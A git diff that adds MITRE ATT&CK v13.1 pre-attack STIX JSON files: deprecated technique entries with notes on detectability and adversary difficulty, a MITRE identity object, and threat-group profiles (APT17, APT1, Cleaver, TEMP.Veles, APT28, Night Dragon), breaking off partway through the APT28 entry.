@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--078ec5be-f013-4efd-9ed2-31a69f1e266c", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--ef6197fd-a58a-4006-bfd6-1d7765d8409d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Enumerate externally facing software applications technologies, languages, and dependencies", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1261).\n\nSoftware applications will be built using different technologies, languages, and dependencies. This information may reveal vulnerabilities or opportunities to an adversary. (Citation: CommonApplicationAttacks) (Citation: WebApplicationSecurity) (Citation: SANSTop25)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1261", + "external_id": "T1261" + }, + { + "source_name": "CommonApplicationAttacks", + "description": "Paul Ionescu. (2015, April 8). The 10 Most Common Application Attacks in Action. Retrieved March 5, 2017." + }, + { + "source_name": "WebApplicationSecurity", + "description": "Gregory Leonard. (2016, February). Getting Started with Web Application Security. Retrieved March 5, 2017." + }, + { + "source_name": "SANSTop25", + "description": "SANS Institute. (2011, June 27). CWE/SANS TOP 25 Most Dangerous Software Errors. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Impossible to differentiate between an adversary and a normal user when accessing a site to determine the languages/technologies used. 
If active scanning tools are employed, then the defender has the ability to detect. However, this is typically not acted upon due to the large volume of this type of traffic and it will likely not prompt the defender to take any actionable defense. Defender review of access logs may provide some insight based on trends or patterns.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Basic interaction with the site provides insight into the programming languages/technologies used for a given web site. Additionally many of the active scanning tools will also provide some insight into this information.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1038", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--f4c5d1d9-8f0e-46f1-a9fa-f9a440926046.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--f4c5d1d9-8f0e-46f1-a9fa-f9a440926046.json new file mode 100644 index 0000000000000000000000000000000000000000..b44122b850b5ae8976567fd7d39d58050b3b06e8 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--f4c5d1d9-8f0e-46f1-a9fa-f9a440926046.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--aedd0e9b-a632-4eaf-8b5c-7b15302bf1db", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--f4c5d1d9-8f0e-46f1-a9fa-f9a440926046", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Confirmation of launched compromise achieved", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nUpon successful compromise the adversary may implement methods for confirming success including communication to a command and control server, exfiltration of data, or a verifiable intended effect such as a publicly accessible resource being inaccessible or a web page being defaced. (Citation: FireEye Malware Stages) (Citation: APTNetworkTrafficAnalysis)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1383", + "url": "https://attack.mitre.org/techniques/T1383" + }, + { + "description": "carlota. (2014, November 12). Stages of a Malware Infection. Retrieved April 1, 2017.", + "source_name": "FireEye Malware Stages" + }, + { + "description": "Nart Villeneuve and James Bennett. (2012). Detecting APT Activity with Network Traffic Analysis. 
Retrieved March 9, 2017.", + "source_name": "APTNetworkTrafficAnalysis" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-03-30T14:17:12.000Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1160", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Certainty of the confirmation of compromise is not guaranteed unless the adversary sees communication to a command and control server, exfiltration of data, or an intended effect occur.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Current commercial tools and sensitive analytics can be used to detect communications to command and control servers or data exfiltration.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--fb39384c-00e4-414a-88af-e80c4904e0b8.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--fb39384c-00e4-414a-88af-e80c4904e0b8.json new file mode 100644 index 0000000000000000000000000000000000000000..0b1d1c8610a38eeb0a874e651392496e02049d2f --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--fb39384c-00e4-414a-88af-e80c4904e0b8.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--cd6b13d5-524f-41f0-abf8-d36c5ca05f79", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--fb39384c-00e4-414a-88af-e80c4904e0b8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Human performs requested action of physical nature", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nThrough social engineering or other methods, an adversary can get users to perform physical actions that provide access to an adversary. This could include providing a password over the phone or inserting a 'found' CD or USB into a system. (Citation: AnonHBGary) (Citation: CSOInsideOutside)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1385", + "url": "https://attack.mitre.org/techniques/T1385" + }, + { + "source_name": "AnonHBGary", + "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/" + }, + { + "description": "Taylor Armerding. (2012, October 25). Line blurs between insider, outsider attacks. 
Retrieved March 9, 2017.", + "source_name": "CSOInsideOutside" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-10-14T01:53:28.015Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1162", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Ill-informed users insert devices into their network that they randomly find, despite training educating them why this is not a wise idea.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Non-hypersensing environments do not typically collect this level of detailed information.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--fddd81e9-dd3d-477e-9773-4fb8ae227234.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--fddd81e9-dd3d-477e-9773-4fb8ae227234.json new file mode 100644 index 0000000000000000000000000000000000000000..d43d07f840f83b047d6478e1796bccb2e81e3bb5 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--fddd81e9-dd3d-477e-9773-4fb8ae227234.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--7b27afd2-395a-49df-bce1-1eed69fef1a1", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--fddd81e9-dd3d-477e-9773-4fb8ae227234", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create custom payloads", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1345).\n\nA payload is the part of the malware which performs a malicious action. The adversary may create custom payloads when none exist with the needed capability or when targeting a specific environment. (Citation: APT1)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1345", + "external_id": "T1345" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "It is likely that an adversary will create and develop payloads on inaccessible or unknown networks for OPSEC reasons.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Specialized tools exist for research, development, and testing of virus/malware payloads.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1122", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--fe421ab9-c8f3-42f7-9ae1-5d6c324cc925.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--fe421ab9-c8f3-42f7-9ae1-5d6c324cc925.json new file mode 100644 index 0000000000000000000000000000000000000000..da91f9b16e52b0a9ec3c4c1adcdc5e86d10d58f8 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--fe421ab9-c8f3-42f7-9ae1-5d6c324cc925.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--783227b6-cdb4-4a6d-be3c-13139c2f3ab0", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--fe421ab9-c8f3-42f7-9ae1-5d6c324cc925", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze application security posture", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1293).\n\nAn adversary can probe a victim's network to determine configurations. The configurations may provide opportunities to route traffic through the network in an undetected or less detectable way. (Citation: Li2014ExploitKits) (Citation: RecurlyGHOST)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1293", + "external_id": "T1293" + }, + { + "source_name": "Li2014ExploitKits", + "description": "Brooks Li. (2014, December 17). What\u2019s New in Exploit Kits in 2014. Retrieved March 6, 2017." + }, + { + "source_name": "RecurlyGHOST", + "description": "Mark Poole. (2015, January 27). GHOST vulnerability (CVE-2015-0235) in popular Linux library glibc allows remote code execution. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This can be done offline after the data has been collected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Analyze technical scanning results to identify weaknesses in the configuration or architecture. 
Many of the common tools highlight these weakness automatically (e.g., software security scanning tools or published vulnerabilities about commonly used libraries).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1070", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json b/cti-ATT-CK-v13.1/pre-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json new file mode 100644 index 0000000000000000000000000000000000000000..0b64de28bfcc9eae26a97849b555ad9b207e1cde --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json @@ -0,0 +1,18 @@ +{ + "type": "bundle", + "id": "bundle--2ab539fd-78b4-43e1-8dfe-41a7d942d680", + "spec_version": "2.0", + "objects": [ + { + "id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "The MITRE Corporation", + "identity_class": "organization", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "identity", + "modified": "2017-06-01T00:00:00.000Z", + "created": "2017-06-01T00:00:00.000Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae.json b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae.json new file mode 100644 index 0000000000000000000000000000000000000000..e19c386eb931aa4b38efbdb5916d51fdc5d412db --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--25f1515d-ceeb-448b-91fd-d912a91040d0", + "spec_version": "2.0", + "objects": [ + { + "type": "intrusion-set", + "id": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "APT17", + "description": "[APT17](https://attack.mitre.org/groups/G0025) is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. (Citation: FireEye APT17)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0025", + "external_id": "G0025" + }, + { + "source_name": "APT17", + "description": "(Citation: FireEye APT17)" + }, + { + "source_name": "Deputy Dog", + "description": "(Citation: FireEye APT17)" + }, + { + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "source_name": "FireEye APT17" + } + ], + "aliases": [ + "APT17", + "Deputy Dog" + ], + "modified": "2020-10-13T22:33:14.018Z", + "created": "2017-05-31T21:31:57.307Z", + "x_mitre_version": "1.1" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8.json b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8.json new file mode 100644 index 0000000000000000000000000000000000000000..bf2851b2e17b8c0a40ab9b6d7c2c104727e98558 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8.json 
@@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--019d9433-1f4d-4b2b-9619-e44daf33d4db", + "spec_version": "2.0", + "objects": [ + { + "type": "intrusion-set", + "id": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Night Dragon", + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) is a campaign name for activity involving a threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0014", + "external_id": "G0014" + }, + { + "source_name": "Night Dragon", + "description": "(Citation: McAfee Night Dragon)" + }, + { + "source_name": "McAfee Night Dragon", + "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. Retrieved February 19, 2018.", + "url": "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + } + ], + "aliases": [ + "Night Dragon" + ], + "modified": "2020-10-15T00:54:00.656Z", + "created": "2017-05-31T21:31:51.643Z", + "x_mitre_version": "1.3" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662.json b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662.json new file mode 100644 index 0000000000000000000000000000000000000000..0c060302aafe071043db5e27b7186ba6b4d932d8 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662.json 
@@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--c223e6c8-a288-4071-9f54-9cb24c66e0bc", + "spec_version": "2.0", + "objects": [ + { + "type": "intrusion-set", + "id": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "APT1", + "description": "[APT1](https://attack.mitre.org/groups/G0006) is a Chinese threat group that has been attributed to the 2nd Bureau of the People\u2019s Liberation Army (PLA) General Staff Department\u2019s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. (Citation: Mandiant APT1)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0006", + "external_id": "G0006" + }, + { + "source_name": "APT1", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Crew", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Group", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Panda", + "description": "(Citation: CrowdStrike Putter Panda)" + }, + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + }, + { + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. 
Retrieved January 22, 2016.", + "source_name": "CrowdStrike Putter Panda" + } + ], + "aliases": [ + "APT1", + "Comment Crew", + "Comment Group", + "Comment Panda" + ], + "modified": "2020-10-22T18:35:55.290Z", + "created": "2017-05-31T21:31:47.955Z", + "x_mitre_version": "1.3" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063.json b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063.json new file mode 100644 index 0000000000000000000000000000000000000000..4426eef26935b8b88bc97652c18407a06cae619f --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--dd0362fe-39ff-4025-9dbd-33191b2cc735", + "spec_version": "2.0", + "objects": [ + { + "type": "intrusion-set", + "id": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Cleaver", + "description": "[Cleaver](https://attack.mitre.org/groups/G0003) is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. (Citation: Cylance Cleaver) Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). (Citation: Dell Threat Group 2889)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0003", + "external_id": "G0003" + }, + { + "source_name": "Cleaver", + "description": "(Citation: Cylance Cleaver)" + }, + { + "source_name": "Threat Group 2889", + "description": "(Citation: Dell Threat Group 2889)" + }, + { + "source_name": "TG-2889", + "description": "(Citation: Dell Threat Group 2889)" + }, + { + "source_name": "Cylance Cleaver", + "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", + "url": "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + }, + { + "url": "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/", + "description": "Dell SecureWorks. (2015, October 7). Suspected Iran-Based Hacker Group Creates Network of Fake LinkedIn Profiles. 
Retrieved January 14, 2016.", + "source_name": "Dell Threat Group 2889" + } + ], + "aliases": [ + "Cleaver", + "Threat Group 2889", + "TG-2889" + ], + "modified": "2020-10-15T16:59:26.732Z", + "created": "2017-05-31T21:31:46.390Z", + "x_mitre_version": "1.2" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4.json b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4.json new file mode 100644 index 0000000000000000000000000000000000000000..ef12f514c026a3d76e9bb614f6d3864d328ced59 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4.json 
@@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--ea9487f2-c86c-40c9-b68b-210ef5b3cf1f", + "spec_version": "2.0", + "objects": [ + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://attack.mitre.org/groups/G0088", + "source_name": "mitre-attack", + "external_id": "G0088" + }, + { + "source_name": "TEMP.Veles", + "description": "(Citation: FireEye TRITON 2019)" + }, + { + "source_name": "XENOTIME", + "description": "The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind TRITON.(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 )" + }, + { + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "source_name": "FireEye TRITON 2019" + }, + { + "description": "FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html ", + "source_name": "FireEye TEMP.Veles 2018" + }, + { + "source_name": "FireEye TEMP.Veles JSON April 2019", + "url": "https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html", + "description": "Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019." + }, + { + "description": "Dragos, Inc.. (n.d.). Xenotime. 
Retrieved April 16, 2019.", + "url": "https://dragos.com/resource/xenotime/", + "source_name": "Dragos Xenotime 2018" + }, + { + "description": "Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.", + "url": "https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/", + "source_name": "Pylos Xenotime 2019" + }, + { + "source_name": "FireEye TEMP.Veles 2018 ", + "url": "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html ", + "description": "FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019." + } + ], + "name": "TEMP.Veles", + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)", + "type": "intrusion-set", + "id": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "aliases": [ + "TEMP.Veles", + "XENOTIME" + ], + "modified": "2020-10-04T23:31:36.937Z", + "created": "2019-04-16T15:14:38.533Z", + "x_mitre_version": "1.2" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c.json b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c.json new file mode 100644 index 0000000000000000000000000000000000000000..626d86a1aa9cf0cd1e0caac6226381bb49791692 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/intrusion-set/intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c.json 
@@ -0,0 +1,195 @@ +{ + "type": "bundle", + "id": "bundle--92b2fd69-4f54-47bd-8d13-8b77814f460e", + "spec_version": "2.0", + "objects": [ + { + "type": "intrusion-set", + "id": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "APT28", + "description": "[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Technica GRU indictment Jul 2018) (Citation: Crowdstrike DNC June 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: Palo Alto Sofacy 06-2018) (Citation: Symantec APT28 Oct 2018) (Citation: ESET Zebrocy May 2019)\n\n[APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). 
", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "external_id": "G0007", + "url": "https://attack.mitre.org/groups/G0007", + "source_name": "mitre-attack" + }, + { + "source_name": "APT28", + "description": "(Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)" + }, + { + "source_name": "SNAKEMACKEREL", + "description": "(Citation: Accenture SNAKEMACKEREL Nov 2018)" + }, + { + "source_name": "Swallowtail", + "description": "(Citation: Symantec APT28 Oct 2018)" + }, + { + "source_name": "Group 74", + "description": "(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "Sednit", + "description": "This designation has been used in reporting both to refer to the threat group and its associated malware JHUHUGIT. (Citation: FireEye APT28 January 2017) (Citation: SecureWorks TG-4127) (Citation: Kaspersky Sofacy) (Citation: Ars Technica GRU indictment Jul 2018)" + }, + { + "source_name": "Sofacy", + "description": "This designation has been used in reporting both to refer to the threat group and its associated malware. 
